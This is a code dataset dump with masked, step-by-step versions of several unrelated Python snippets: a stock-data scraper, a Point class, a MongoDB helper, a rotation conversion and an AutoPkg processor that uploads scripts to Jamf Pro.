"step-2": "<mask token>\n\n\ndef get_last_element_timestamp(url):\n conn = urllib2.urlopen(url)\n html = conn.read()\n soup = BeautifulSoup(html, 'lxml')\n elements = soup.find_all('div')[-1]\n return elements.text\n\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return csv_reader[-1]\n\n\nfor page, url_value in url.items():\n print(page, get_last_element_timestamp(url_value))\n<mask token>\nprint('Historic csv infosys => BSE')\nprint(historic_data(bse_info_csv))\nprint('Historic csv of infosys => NSE')\nprint(historic_data(nse_info_csv))\nprint('Historic csv of sensex ')\nprint(historic_data(historic_sensex))\nprint('Historic csv of nifty')\nprint(historic_data(historic_nifty))\n",
"step-3": "<mask token>\nurl = {'Home ': 'https://www.moneycontrol.com/'}\n\n\ndef get_last_element_timestamp(url):\n conn = urllib2.urlopen(url)\n html = conn.read()\n soup = BeautifulSoup(html, 'lxml')\n elements = soup.find_all('div')[-1]\n return elements.text\n\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return csv_reader[-1]\n\n\nfor page, url_value in url.items():\n print(page, get_last_element_timestamp(url_value))\nbse_info_csv = 'http://www.moneycontrol.com/tech_charts/bse/his/it.csv'\nnse_info_csv = 'http://www.moneycontrol.com/tech_charts/nse/his/it.csv'\nhistoric_sensex = 'http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv'\nhistoric_nifty = 'http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv'\nprint('Historic csv infosys => BSE')\nprint(historic_data(bse_info_csv))\nprint('Historic csv of infosys => NSE')\nprint(historic_data(nse_info_csv))\nprint('Historic csv of sensex ')\nprint(historic_data(historic_sensex))\nprint('Historic csv of nifty')\nprint(historic_data(historic_nifty))\n",
"step-4": "import urllib2\nimport csv\nfrom bs4 import BeautifulSoup\nurl = {'Home ': 'https://www.moneycontrol.com/'}\n\n\ndef get_last_element_timestamp(url):\n conn = urllib2.urlopen(url)\n html = conn.read()\n soup = BeautifulSoup(html, 'lxml')\n elements = soup.find_all('div')[-1]\n return elements.text\n\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return csv_reader[-1]\n\n\nfor page, url_value in url.items():\n print(page, get_last_element_timestamp(url_value))\nbse_info_csv = 'http://www.moneycontrol.com/tech_charts/bse/his/it.csv'\nnse_info_csv = 'http://www.moneycontrol.com/tech_charts/nse/his/it.csv'\nhistoric_sensex = 'http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv'\nhistoric_nifty = 'http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv'\nprint('Historic csv infosys => BSE')\nprint(historic_data(bse_info_csv))\nprint('Historic csv of infosys => NSE')\nprint(historic_data(nse_info_csv))\nprint('Historic csv of sensex ')\nprint(historic_data(historic_sensex))\nprint('Historic csv of nifty')\nprint(historic_data(historic_nifty))\n",
"step-5": "import urllib2\nimport csv\nfrom bs4 import BeautifulSoup\nurl = {\n \"Home \": 'https://www.moneycontrol.com/',\n# \"Market\": 'https://www.moneycontrol.com/stocksmarketsindia/',\n# \"Mf Home\": 'https://www.moneycontrol.com/mutualfundindia/'\n}\ndef get_last_element_timestamp(url):\n conn = urllib2.urlopen(url)\n html = conn.read()\n soup = BeautifulSoup(html,\"lxml\")\n elements = soup.find_all('div')[-1]\n return elements.text\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return (csv_reader[-1])\n\nfor page,url_value in url.items():\n print (page,get_last_element_timestamp(url_value))\n# print page\n##\nbse_info_csv=\"http://www.moneycontrol.com/tech_charts/bse/his/it.csv\"\nnse_info_csv = \"http://www.moneycontrol.com/tech_charts/nse/his/it.csv\"\nhistoric_sensex = \"http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv\"\nhistoric_nifty = \"http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv\"\nprint(\"Historic csv infosys => BSE\")\nprint(historic_data(bse_info_csv))\nprint (\"Historic csv of infosys => NSE\")\nprint(historic_data(nse_info_csv)) \nprint (\"Historic csv of sensex \")\nprint(historic_data(historic_sensex))\nprint (\"Historic csv of nifty\")\nprint (historic_data(historic_nifty)) \n\n\n\n\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
class Point:
<|reserved_special_token_0|>
def __str__(self):
return '({0},{1})'.format(self.x, self.y)
def __add__(self, other):
self.x = self.x + other.x
self.y = self.y + other.y
return Point(self.x, self.y)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return '({0},{1})'.format(self.x, self.y)
def __add__(self, other):
self.x = self.x + other.x
self.y = self.y + other.y
return Point(self.x, self.y)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return '({0},{1})'.format(self.x, self.y)
def __add__(self, other):
self.x = self.x + other.x
self.y = self.y + other.y
return Point(self.x, self.y)
<|reserved_special_token_0|>
print(p1)
print(p2)
<|reserved_special_token_0|>
print(p3)
<|reserved_special_token_1|>
class Point:
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return '({0},{1})'.format(self.x, self.y)
def __add__(self, other):
self.x = self.x + other.x
self.y = self.y + other.y
return Point(self.x, self.y)
p1 = Point(1, 2)
p2 = Point(3, 4)
print(p1)
print(p2)
p3 = p1 + p2
print(p3)
<|reserved_special_token_1|>
class Point:
def __init__(self,x,y):
self.x=x
self.y=y
def __str__(self):
return "({0},{1})".format(self.x,self.y)
def __add__(self, other):
self.x=self.x+other.x
self.y=self.y+other.y
return Point(self.x,self.y)
p1=Point(1,2)
p2=Point(3,4)
print(p1)
print(p2)
p3=p1+p2
print(p3)
|
flexible
|
{
"blob_id": "1bebd3c18742f5362d2e5f22c539f6b13ad58d2a",
"index": 2873,
"step-1": "class Point:\n <mask token>\n\n def __str__(self):\n return '({0},{1})'.format(self.x, self.y)\n\n def __add__(self, other):\n self.x = self.x + other.x\n self.y = self.y + other.y\n return Point(self.x, self.y)\n\n\n<mask token>\n",
"step-2": "class Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return '({0},{1})'.format(self.x, self.y)\n\n def __add__(self, other):\n self.x = self.x + other.x\n self.y = self.y + other.y\n return Point(self.x, self.y)\n\n\n<mask token>\n",
"step-3": "class Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return '({0},{1})'.format(self.x, self.y)\n\n def __add__(self, other):\n self.x = self.x + other.x\n self.y = self.y + other.y\n return Point(self.x, self.y)\n\n\n<mask token>\nprint(p1)\nprint(p2)\n<mask token>\nprint(p3)\n",
"step-4": "class Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __str__(self):\n return '({0},{1})'.format(self.x, self.y)\n\n def __add__(self, other):\n self.x = self.x + other.x\n self.y = self.y + other.y\n return Point(self.x, self.y)\n\n\np1 = Point(1, 2)\np2 = Point(3, 4)\nprint(p1)\nprint(p2)\np3 = p1 + p2\nprint(p3)\n",
"step-5": "class Point:\r\n def __init__(self,x,y):\r\n self.x=x\r\n self.y=y\r\n\r\n def __str__(self):\r\n return \"({0},{1})\".format(self.x,self.y)\r\n\r\n def __add__(self, other):\r\n self.x=self.x+other.x\r\n self.y=self.y+other.y\r\n return Point(self.x,self.y)\r\n\r\np1=Point(1,2)\r\np2=Point(3,4)\r\nprint(p1)\r\nprint(p2)\r\np3=p1+p2\r\nprint(p3)\r\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from pymongo import MongoClient
import Config
DB = Config.DB
COLLECTION = Config.COLLECTION
def connectMongo():
uri = "mongodb://localhost"
client = MongoClient(uri)
return client[DB]
def connectMongoCollection(collection = COLLECTION):
uri = "mongodb://localhost"
client = MongoClient(uri)
db = client[DB]
return db[collection]
|
normal
|
{
"blob_id": "7a5106456d0fdd905829c5aa1f4a69b027f3a04c",
"index": 4198,
"step-1": "<mask token>\n\n\ndef connectMongoCollection(collection=COLLECTION):\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n db = client[DB]\n return db[collection]\n",
"step-2": "<mask token>\n\n\ndef connectMongo():\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n return client[DB]\n\n\ndef connectMongoCollection(collection=COLLECTION):\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n db = client[DB]\n return db[collection]\n",
"step-3": "<mask token>\nDB = Config.DB\nCOLLECTION = Config.COLLECTION\n\n\ndef connectMongo():\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n return client[DB]\n\n\ndef connectMongoCollection(collection=COLLECTION):\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n db = client[DB]\n return db[collection]\n",
"step-4": "from pymongo import MongoClient\nimport Config\nDB = Config.DB\nCOLLECTION = Config.COLLECTION\n\n\ndef connectMongo():\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n return client[DB]\n\n\ndef connectMongoCollection(collection=COLLECTION):\n uri = 'mongodb://localhost'\n client = MongoClient(uri)\n db = client[DB]\n return db[collection]\n",
"step-5": "from pymongo import MongoClient\nimport Config\n\nDB = Config.DB\nCOLLECTION = Config.COLLECTION\n\n\ndef connectMongo():\n\turi = \"mongodb://localhost\"\n\tclient = MongoClient(uri)\n\treturn client[DB]\n\ndef connectMongoCollection(collection = COLLECTION):\n\turi = \"mongodb://localhost\"\n\tclient = MongoClient(uri)\n\tdb = client[DB]\n\treturn db[collection]\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import numpy as np
def SO3_to_R3(x_skew):
x = np.zeros((3, 1))
x[0, 0] = -1 * x_skew[1, 2]
x[1, 0] = x_skew[0, 2]
x[2, 0] = -1 * x_skew[0, 1]
return x
|
normal
|
{
"blob_id": "97bff6eb0cd16c915180cb634e6bf30e17adfdef",
"index": 2080,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef SO3_to_R3(x_skew):\n x = np.zeros((3, 1))\n x[0, 0] = -1 * x_skew[1, 2]\n x[1, 0] = x_skew[0, 2]\n x[2, 0] = -1 * x_skew[0, 1]\n return x\n",
"step-3": "import numpy as np\n\n\ndef SO3_to_R3(x_skew):\n x = np.zeros((3, 1))\n x[0, 0] = -1 * x_skew[1, 2]\n x[1, 0] = x_skew[0, 2]\n x[2, 0] = -1 * x_skew[0, 1]\n return x\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class JamfScriptUploader(JamfUploaderBase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class JamfScriptUploader(JamfUploaderBase):
description = (
'A processor for AutoPkg that will upload a script to a Jamf Cloud or on-prem server.'
)
input_variables = {'JSS_URL': {'required': True, 'description':
'URL to a Jamf Pro server that the API user has write access to, optionally set as a key in the com.github.autopkg preference file.'
}, 'API_USERNAME': {'required': True, 'description':
'Username of account with appropriate access to jss, optionally set as a key in the com.github.autopkg preference file.'
}, 'API_PASSWORD': {'required': True, 'description':
'Password of api user, optionally set as a key in the com.github.autopkg preference file.'
}, 'script_path': {'required': False, 'description':
'Full path to the script to be uploaded'}, 'script_name': {
'required': False, 'description': 'Name of the script in Jamf'},
'script_category': {'required': False, 'description':
'Script category', 'default': ''}, 'script_priority': {'required':
False, 'description': 'Script priority (BEFORE or AFTER)',
'default': 'AFTER'}, 'osrequirements': {'required': False,
'description': 'Script OS requirements', 'default': ''},
'script_info': {'required': False, 'description':
'Script info field', 'default': ''}, 'script_notes': {'required':
False, 'description': 'Script notes field', 'default': ''},
'script_parameter4': {'required': False, 'description':
'Script parameter 4 title', 'default': ''}, 'script_parameter5': {
'required': False, 'description': 'Script parameter 5 title',
'default': ''}, 'script_parameter6': {'required': False,
'description': 'Script parameter 6 title', 'default': ''},
'script_parameter7': {'required': False, 'description':
'Script parameter 7 title', 'default': ''}, 'script_parameter8': {
'required': False, 'description': 'Script parameter 8 title',
'default': ''}, 'script_parameter9': {'required': False,
'description': 'Script parameter 9 title', 'default': ''},
'script_parameter10': {'required': False, 'description':
'Script parameter 10 title', 'default': ''}, 'script_parameter11':
{'required': False, 'description': 'Script parameter 11 title',
'default': ''}, 'replace_script': {'required': False, 'description':
'Overwrite an existing script if True.', 'default': False}, 'sleep':
{'required': False, 'description':
'Pause after running this processor for specified seconds.',
'default': '0'}}
output_variables = {'script_name': {'required': False, 'description':
'Name of the uploaded script'}, 'jamfscriptuploader_summary_result':
{'description': 'Description of interesting results.'}}
def upload_script(self, jamf_url, script_name, script_path, category_id,
script_category, script_info, script_notes, script_priority,
script_parameter4, script_parameter5, script_parameter6,
script_parameter7, script_parameter8, script_parameter9,
script_parameter10, script_parameter11, script_os_requirements,
token, obj_id=0):
"""Update script metadata."""
if os.path.exists(script_path):
with open(script_path, 'r') as file:
script_contents = file.read()
else:
raise ProcessorError('Script does not exist!')
script_contents = self.substitute_assignable_keys(script_contents)
if script_priority:
script_priority = script_priority.upper()
script_data = {'name': script_name, 'info': script_info, 'notes':
script_notes, 'priority': script_priority, 'categoryId':
category_id, 'categoryName': script_category, 'parameter4':
script_parameter4, 'parameter5': script_parameter5,
'parameter6': script_parameter6, 'parameter7':
script_parameter7, 'parameter8': script_parameter8,
'parameter9': script_parameter9, 'parameter10':
script_parameter10, 'parameter11': script_parameter11,
'osRequirements': script_os_requirements, 'scriptContents':
script_contents}
self.output('Script data:', verbose_level=2)
self.output(script_data, verbose_level=2)
script_json = self.write_json_file(script_data)
self.output('Uploading script..')
object_type = 'script'
if obj_id:
url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(
object_type), obj_id)
else:
url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))
count = 0
while True:
count += 1
self.output('Script upload attempt {}'.format(count),
verbose_level=2)
request = 'PUT' if obj_id else 'POST'
r = self.curl(request=request, url=url, token=token, data=
script_json)
if self.status_check(r, 'Script', script_name, request) == 'break':
break
if count > 5:
self.output('Script upload did not succeed after 5 attempts')
self.output('\nHTTP POST Response Code: {}'.format(r.
status_code))
raise ProcessorError('ERROR: Script upload failed ')
if int(self.sleep) > 30:
sleep(int(self.sleep))
else:
sleep(30)
return r
def main(self):
"""Do the main thing here"""
self.jamf_url = self.env.get('JSS_URL')
self.jamf_user = self.env.get('API_USERNAME')
self.jamf_password = self.env.get('API_PASSWORD')
self.script_path = self.env.get('script_path')
self.script_name = self.env.get('script_name')
self.script_category = self.env.get('script_category')
self.script_priority = self.env.get('script_priority')
self.osrequirements = self.env.get('osrequirements')
self.script_info = self.env.get('script_info')
self.script_notes = self.env.get('script_notes')
self.script_parameter4 = self.env.get('script_parameter4')
self.script_parameter5 = self.env.get('script_parameter5')
self.script_parameter6 = self.env.get('script_parameter6')
self.script_parameter7 = self.env.get('script_parameter7')
self.script_parameter8 = self.env.get('script_parameter8')
self.script_parameter9 = self.env.get('script_parameter9')
self.script_parameter10 = self.env.get('script_parameter10')
self.script_parameter11 = self.env.get('script_parameter11')
self.replace = self.env.get('replace_script')
self.sleep = self.env.get('sleep')
if not self.replace or self.replace == 'False':
self.replace = False
if 'jamfscriptuploader_summary_result' in self.env:
del self.env['jamfscriptuploader_summary_result']
script_uploaded = False
token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.
jamf_password)
if self.script_category:
self.output('Checking categories for {}'.format(self.
script_category))
obj_type = 'category'
obj_name = self.script_category
category_id = self.get_uapi_obj_id_from_name(self.jamf_url,
obj_type, obj_name, token)
if not category_id:
self.output('WARNING: Category not found!')
category_id = '-1'
else:
self.output('Category {} found: ID={}'.format(self.
script_category, category_id))
else:
self.script_category = ''
category_id = '-1'
if not self.script_path.startswith('/'):
found_template = self.get_path_to_file(self.script_path)
if found_template:
self.script_path = found_template
else:
raise ProcessorError(
f'ERROR: Script file {self.script_path} not found')
if not self.script_name:
self.script_name = os.path.basename(self.script_path)
self.output("Checking for existing '{}' on {}".format(self.
script_name, self.jamf_url))
self.output('Full path: {}'.format(self.script_path), verbose_level=2)
obj_type = 'script'
obj_name = self.script_name
obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,
obj_name, token)
if obj_id:
self.output("Script '{}' already exists: ID {}".format(self.
script_name, obj_id))
if self.replace:
self.output(
"Replacing existing script as 'replace_script' is set to {}"
.format(self.replace), verbose_level=1)
else:
self.output(
"Not replacing existing script. Use replace_script='True' to enforce."
, verbose_level=1)
return
self.upload_script(self.jamf_url, self.script_name, self.
script_path, category_id, self.script_category, self.
script_info, self.script_notes, self.script_priority, self.
script_parameter4, self.script_parameter5, self.
script_parameter6, self.script_parameter7, self.
script_parameter8, self.script_parameter9, self.
script_parameter10, self.script_parameter11, self.
osrequirements, token, obj_id)
script_uploaded = True
self.env['script_name'] = self.script_name
self.env['script_uploaded'] = script_uploaded
if script_uploaded:
self.env['jamfscriptuploader_summary_result'] = {'summary_text':
'The following scripts were created or updated in Jamf Pro:',
'report_fields': ['script', 'path', 'category', 'priority',
'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',
'P9', 'P10', 'P11'], 'data': {'script': self.script_name,
'path': self.script_path, 'category': self.script_category,
'priority': str(self.script_priority), 'info': self.
script_info, 'os_req': self.osrequirements, 'notes': self.
script_notes, 'P4': self.script_parameter4, 'P5': self.
script_parameter5, 'P6': self.script_parameter6, 'P7': self
.script_parameter7, 'P8': self.script_parameter8, 'P9':
self.script_parameter9, 'P10': self.script_parameter10,
'P11': self.script_parameter11}}
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.insert(0, os.path.dirname(__file__))
<|reserved_special_token_0|>
class JamfScriptUploader(JamfUploaderBase):
description = (
'A processor for AutoPkg that will upload a script to a Jamf Cloud or on-prem server.'
)
input_variables = {'JSS_URL': {'required': True, 'description':
'URL to a Jamf Pro server that the API user has write access to, optionally set as a key in the com.github.autopkg preference file.'
}, 'API_USERNAME': {'required': True, 'description':
'Username of account with appropriate access to jss, optionally set as a key in the com.github.autopkg preference file.'
}, 'API_PASSWORD': {'required': True, 'description':
'Password of api user, optionally set as a key in the com.github.autopkg preference file.'
}, 'script_path': {'required': False, 'description':
'Full path to the script to be uploaded'}, 'script_name': {
'required': False, 'description': 'Name of the script in Jamf'},
'script_category': {'required': False, 'description':
'Script category', 'default': ''}, 'script_priority': {'required':
False, 'description': 'Script priority (BEFORE or AFTER)',
'default': 'AFTER'}, 'osrequirements': {'required': False,
'description': 'Script OS requirements', 'default': ''},
'script_info': {'required': False, 'description':
'Script info field', 'default': ''}, 'script_notes': {'required':
False, 'description': 'Script notes field', 'default': ''},
'script_parameter4': {'required': False, 'description':
'Script parameter 4 title', 'default': ''}, 'script_parameter5': {
'required': False, 'description': 'Script parameter 5 title',
'default': ''}, 'script_parameter6': {'required': False,
'description': 'Script parameter 6 title', 'default': ''},
'script_parameter7': {'required': False, 'description':
'Script parameter 7 title', 'default': ''}, 'script_parameter8': {
'required': False, 'description': 'Script parameter 8 title',
'default': ''}, 'script_parameter9': {'required': False,
'description': 'Script parameter 9 title', 'default': ''},
'script_parameter10': {'required': False, 'description':
'Script parameter 10 title', 'default': ''}, 'script_parameter11':
{'required': False, 'description': 'Script parameter 11 title',
'default': ''}, 'replace_script': {'required': False, 'description':
'Overwrite an existing script if True.', 'default': False}, 'sleep':
{'required': False, 'description':
'Pause after running this processor for specified seconds.',
'default': '0'}}
output_variables = {'script_name': {'required': False, 'description':
'Name of the uploaded script'}, 'jamfscriptuploader_summary_result':
{'description': 'Description of interesting results.'}}
def upload_script(self, jamf_url, script_name, script_path, category_id,
script_category, script_info, script_notes, script_priority,
script_parameter4, script_parameter5, script_parameter6,
script_parameter7, script_parameter8, script_parameter9,
script_parameter10, script_parameter11, script_os_requirements,
token, obj_id=0):
"""Update script metadata."""
if os.path.exists(script_path):
with open(script_path, 'r') as file:
script_contents = file.read()
else:
raise ProcessorError('Script does not exist!')
script_contents = self.substitute_assignable_keys(script_contents)
if script_priority:
script_priority = script_priority.upper()
script_data = {'name': script_name, 'info': script_info, 'notes':
script_notes, 'priority': script_priority, 'categoryId':
category_id, 'categoryName': script_category, 'parameter4':
script_parameter4, 'parameter5': script_parameter5,
'parameter6': script_parameter6, 'parameter7':
script_parameter7, 'parameter8': script_parameter8,
'parameter9': script_parameter9, 'parameter10':
script_parameter10, 'parameter11': script_parameter11,
'osRequirements': script_os_requirements, 'scriptContents':
script_contents}
self.output('Script data:', verbose_level=2)
self.output(script_data, verbose_level=2)
script_json = self.write_json_file(script_data)
self.output('Uploading script..')
object_type = 'script'
if obj_id:
url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(
object_type), obj_id)
else:
url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))
count = 0
while True:
count += 1
self.output('Script upload attempt {}'.format(count),
verbose_level=2)
request = 'PUT' if obj_id else 'POST'
r = self.curl(request=request, url=url, token=token, data=
script_json)
if self.status_check(r, 'Script', script_name, request) == 'break':
break
if count > 5:
self.output('Script upload did not succeed after 5 attempts')
self.output('\nHTTP POST Response Code: {}'.format(r.
status_code))
raise ProcessorError('ERROR: Script upload failed ')
if int(self.sleep) > 30:
sleep(int(self.sleep))
else:
sleep(30)
return r
def main(self):
"""Do the main thing here"""
self.jamf_url = self.env.get('JSS_URL')
self.jamf_user = self.env.get('API_USERNAME')
self.jamf_password = self.env.get('API_PASSWORD')
self.script_path = self.env.get('script_path')
self.script_name = self.env.get('script_name')
self.script_category = self.env.get('script_category')
self.script_priority = self.env.get('script_priority')
self.osrequirements = self.env.get('osrequirements')
self.script_info = self.env.get('script_info')
self.script_notes = self.env.get('script_notes')
self.script_parameter4 = self.env.get('script_parameter4')
self.script_parameter5 = self.env.get('script_parameter5')
self.script_parameter6 = self.env.get('script_parameter6')
self.script_parameter7 = self.env.get('script_parameter7')
self.script_parameter8 = self.env.get('script_parameter8')
self.script_parameter9 = self.env.get('script_parameter9')
self.script_parameter10 = self.env.get('script_parameter10')
self.script_parameter11 = self.env.get('script_parameter11')
self.replace = self.env.get('replace_script')
self.sleep = self.env.get('sleep')
if not self.replace or self.replace == 'False':
self.replace = False
if 'jamfscriptuploader_summary_result' in self.env:
del self.env['jamfscriptuploader_summary_result']
script_uploaded = False
token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.
jamf_password)
if self.script_category:
self.output('Checking categories for {}'.format(self.
script_category))
obj_type = 'category'
obj_name = self.script_category
category_id = self.get_uapi_obj_id_from_name(self.jamf_url,
obj_type, obj_name, token)
if not category_id:
self.output('WARNING: Category not found!')
category_id = '-1'
else:
self.output('Category {} found: ID={}'.format(self.
script_category, category_id))
else:
self.script_category = ''
category_id = '-1'
if not self.script_path.startswith('/'):
found_template = self.get_path_to_file(self.script_path)
if found_template:
self.script_path = found_template
else:
raise ProcessorError(
f'ERROR: Script file {self.script_path} not found')
if not self.script_name:
self.script_name = os.path.basename(self.script_path)
self.output("Checking for existing '{}' on {}".format(self.
script_name, self.jamf_url))
self.output('Full path: {}'.format(self.script_path), verbose_level=2)
obj_type = 'script'
obj_name = self.script_name
obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,
obj_name, token)
if obj_id:
self.output("Script '{}' already exists: ID {}".format(self.
script_name, obj_id))
if self.replace:
self.output(
"Replacing existing script as 'replace_script' is set to {}"
.format(self.replace), verbose_level=1)
else:
self.output(
"Not replacing existing script. Use replace_script='True' to enforce."
, verbose_level=1)
return
self.upload_script(self.jamf_url, self.script_name, self.
script_path, category_id, self.script_category, self.
script_info, self.script_notes, self.script_priority, self.
script_parameter4, self.script_parameter5, self.
script_parameter6, self.script_parameter7, self.
script_parameter8, self.script_parameter9, self.
script_parameter10, self.script_parameter11, self.
osrequirements, token, obj_id)
script_uploaded = True
self.env['script_name'] = self.script_name
self.env['script_uploaded'] = script_uploaded
if script_uploaded:
self.env['jamfscriptuploader_summary_result'] = {'summary_text':
'The following scripts were created or updated in Jamf Pro:',
'report_fields': ['script', 'path', 'category', 'priority',
'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',
'P9', 'P10', 'P11'], 'data': {'script': self.script_name,
'path': self.script_path, 'category': self.script_category,
'priority': str(self.script_priority), 'info': self.
script_info, 'os_req': self.osrequirements, 'notes': self.
script_notes, 'P4': self.script_parameter4, 'P5': self.
script_parameter5, 'P6': self.script_parameter6, 'P7': self
.script_parameter7, 'P8': self.script_parameter8, 'P9':
self.script_parameter9, 'P10': self.script_parameter10,
'P11': self.script_parameter11}}
if __name__ == '__main__':
PROCESSOR = JamfScriptUploader()
PROCESSOR.execute_shell()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import os.path
import sys
from time import sleep
from autopkglib import ProcessorError
sys.path.insert(0, os.path.dirname(__file__))
from JamfUploaderLib.JamfUploaderBase import JamfUploaderBase
__all__ = ['JamfScriptUploader']
class JamfScriptUploader(JamfUploaderBase):
description = (
'A processor for AutoPkg that will upload a script to a Jamf Cloud or on-prem server.'
)
input_variables = {'JSS_URL': {'required': True, 'description':
'URL to a Jamf Pro server that the API user has write access to, optionally set as a key in the com.github.autopkg preference file.'
}, 'API_USERNAME': {'required': True, 'description':
'Username of account with appropriate access to jss, optionally set as a key in the com.github.autopkg preference file.'
}, 'API_PASSWORD': {'required': True, 'description':
'Password of api user, optionally set as a key in the com.github.autopkg preference file.'
}, 'script_path': {'required': False, 'description':
'Full path to the script to be uploaded'}, 'script_name': {
'required': False, 'description': 'Name of the script in Jamf'},
'script_category': {'required': False, 'description':
'Script category', 'default': ''}, 'script_priority': {'required':
False, 'description': 'Script priority (BEFORE or AFTER)',
'default': 'AFTER'}, 'osrequirements': {'required': False,
'description': 'Script OS requirements', 'default': ''},
'script_info': {'required': False, 'description':
'Script info field', 'default': ''}, 'script_notes': {'required':
False, 'description': 'Script notes field', 'default': ''},
'script_parameter4': {'required': False, 'description':
'Script parameter 4 title', 'default': ''}, 'script_parameter5': {
'required': False, 'description': 'Script parameter 5 title',
'default': ''}, 'script_parameter6': {'required': False,
'description': 'Script parameter 6 title', 'default': ''},
'script_parameter7': {'required': False, 'description':
'Script parameter 7 title', 'default': ''}, 'script_parameter8': {
'required': False, 'description': 'Script parameter 8 title',
'default': ''}, 'script_parameter9': {'required': False,
'description': 'Script parameter 9 title', 'default': ''},
'script_parameter10': {'required': False, 'description':
'Script parameter 10 title', 'default': ''}, 'script_parameter11':
{'required': False, 'description': 'Script parameter 11 title',
'default': ''}, 'replace_script': {'required': False, 'description':
'Overwrite an existing script if True.', 'default': False}, 'sleep':
{'required': False, 'description':
'Pause after running this processor for specified seconds.',
'default': '0'}}
output_variables = {'script_name': {'required': False, 'description':
'Name of the uploaded script'}, 'jamfscriptuploader_summary_result':
{'description': 'Description of interesting results.'}}
def upload_script(self, jamf_url, script_name, script_path, category_id,
script_category, script_info, script_notes, script_priority,
script_parameter4, script_parameter5, script_parameter6,
script_parameter7, script_parameter8, script_parameter9,
script_parameter10, script_parameter11, script_os_requirements,
token, obj_id=0):
"""Update script metadata."""
if os.path.exists(script_path):
with open(script_path, 'r') as file:
script_contents = file.read()
else:
raise ProcessorError('Script does not exist!')
script_contents = self.substitute_assignable_keys(script_contents)
if script_priority:
script_priority = script_priority.upper()
script_data = {'name': script_name, 'info': script_info, 'notes':
script_notes, 'priority': script_priority, 'categoryId':
category_id, 'categoryName': script_category, 'parameter4':
script_parameter4, 'parameter5': script_parameter5,
'parameter6': script_parameter6, 'parameter7':
script_parameter7, 'parameter8': script_parameter8,
'parameter9': script_parameter9, 'parameter10':
script_parameter10, 'parameter11': script_parameter11,
'osRequirements': script_os_requirements, 'scriptContents':
script_contents}
self.output('Script data:', verbose_level=2)
self.output(script_data, verbose_level=2)
script_json = self.write_json_file(script_data)
self.output('Uploading script..')
object_type = 'script'
if obj_id:
url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(
object_type), obj_id)
else:
url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))
count = 0
while True:
count += 1
self.output('Script upload attempt {}'.format(count),
verbose_level=2)
request = 'PUT' if obj_id else 'POST'
r = self.curl(request=request, url=url, token=token, data=
script_json)
if self.status_check(r, 'Script', script_name, request) == 'break':
break
if count > 5:
self.output('Script upload did not succeed after 5 attempts')
self.output('\nHTTP POST Response Code: {}'.format(r.
status_code))
raise ProcessorError('ERROR: Script upload failed ')
if int(self.sleep) > 30:
sleep(int(self.sleep))
else:
sleep(30)
return r
def main(self):
"""Do the main thing here"""
self.jamf_url = self.env.get('JSS_URL')
self.jamf_user = self.env.get('API_USERNAME')
self.jamf_password = self.env.get('API_PASSWORD')
self.script_path = self.env.get('script_path')
self.script_name = self.env.get('script_name')
self.script_category = self.env.get('script_category')
self.script_priority = self.env.get('script_priority')
self.osrequirements = self.env.get('osrequirements')
self.script_info = self.env.get('script_info')
self.script_notes = self.env.get('script_notes')
self.script_parameter4 = self.env.get('script_parameter4')
self.script_parameter5 = self.env.get('script_parameter5')
self.script_parameter6 = self.env.get('script_parameter6')
self.script_parameter7 = self.env.get('script_parameter7')
self.script_parameter8 = self.env.get('script_parameter8')
self.script_parameter9 = self.env.get('script_parameter9')
self.script_parameter10 = self.env.get('script_parameter10')
self.script_parameter11 = self.env.get('script_parameter11')
